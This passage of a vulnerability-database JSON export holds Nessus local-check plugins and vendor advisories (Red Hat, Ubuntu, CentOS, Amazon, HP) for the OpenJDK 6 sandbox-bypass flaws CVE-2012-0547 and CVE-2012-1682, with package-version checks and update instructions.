script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-01T04:39:49", "description": "It was discovered that the Beans component in OpenJDK 6 did not\nproperly prevent access to restricted classes. A remote attacker could\nuse this to create an untrusted Java applet or application that would\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nIt was discovered that functionality in the AWT component in OpenJDK 6\nmade it easier for a remote attacker, in conjunction with other\nvulnerabilities, to bypass Java sandbox restrictions. (CVE-2012-0547).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2012-09-04T00:00:00", "title": "Ubuntu 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : openjdk-6 vulnerabilities (USN-1553-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2021-05-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao", "cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-lib", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1553-1.NASL", "href": "https://www.tenable.com/plugins/nessus/61773", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1553-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61773);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_bugtraq_id(55336, 55339);\n script_xref(name:\"USN\", value:\"1553-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : openjdk-6 vulnerabilities (USN-1553-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Beans component in OpenJDK 6 did not\nproperly prevent access to restricted classes. A remote attacker could\nuse this to create an untrusted Java applet or application that would\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nIt was discovered that functionality in the AWT component in OpenJDK 6\nmade it easier for a remote attacker, in conjunction with other\nvulnerabilities, to bypass Java sandbox restrictions. (CVE-2012-0547).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1553-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|11\\.04|11\\.10|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 11.04 / 11.10 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b24-1.11.4-1ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b24-1.11.4-1ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b24-1.11.4-1ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b24-1.11.4-1ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b24-1.11.4-1ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b24-1.11.4-1ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b24-1.11.4-1ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b24-1.11.4-1ubuntu0.12.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-6-jre-cacao / icedtea-6-jre-jamvm / openjdk-6-jre / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:11:04", "description": "Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 25, "published": "2012-09-04T00:00:00", "title": "RHEL 5 : java-1.6.0-openjdk (RHSA-2012:1222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2012-09-04T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo"], "id": "REDHAT-RHSA-2012-1222.NASL", "href": "https://www.tenable.com/plugins/nessus/61768", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1222. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61768);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_xref(name:\"RHSA\", value:\"2012:1222\");\n\n script_name(english:\"RHEL 5 : java-1.6.0-openjdk (RHSA-2012:1222)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.oracle.com/technetwork/topics/security/\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.9/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb950b63\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:1222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1682\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:1222\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:38", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "**Issue Overview:**\n\nIt was discovered that the Beans component in OpenJDK did not perform permission checks properly. An untrusted Java application or applet could use this flaw to use classes from restricted packages, allowing it to bypass Java sandbox restrictions. ([CVE-2012-1682 __](<https://access.redhat.com/security/cve/CVE-2012-1682>))\n\nA hardening fix was applied to the AWT component in OpenJDK, removing functionality from the restricted SunToolkit class that was used in combination with other flaws to bypass Java sandbox restrictions. ([CVE-2012-0547 __](<https://access.redhat.com/security/cve/CVE-2012-0547>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.i686 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-09-04T10:22:00", "published": "2012-09-04T10:22:00", "id": "ALAS-2012-119", "href": "https://alas.aws.amazon.com/ALAS-2012-119.html", "title": "Important: java-1.6.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0547"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03538957\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03538957\r\nVersion: 1\r\n\r\nHPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect\r\nVulnerabilities\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-10-23\r\nLast Updated: 2012-10-23\r\n\r\nPotential Security Impact: Remote indirect vulnerabilities\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in Java Runtime\r\nEnvironment &#40;JRE&#41; and Java Developer Kit &#40;JDK&#41; running on HP-UX. This could\r\nallow remote unspecified indirect vulnerabilities.\r\n\r\nReferences: CVE-2012-0547\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.15 and\r\nearlier\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-0547 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:N&#41; 0.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following Java version upgrade to resolve this\r\nvulnerability.\r\nThe upgrade is available from the following location\r\n\r\nhttp://www.hp.com/go/java\r\n\r\nHP-UX B.11.11, B.11.23, B.11.31\r\n JDK and JRE v6.0.16 or subsequent\r\n\r\nMANUAL ACTIONS: Yes - 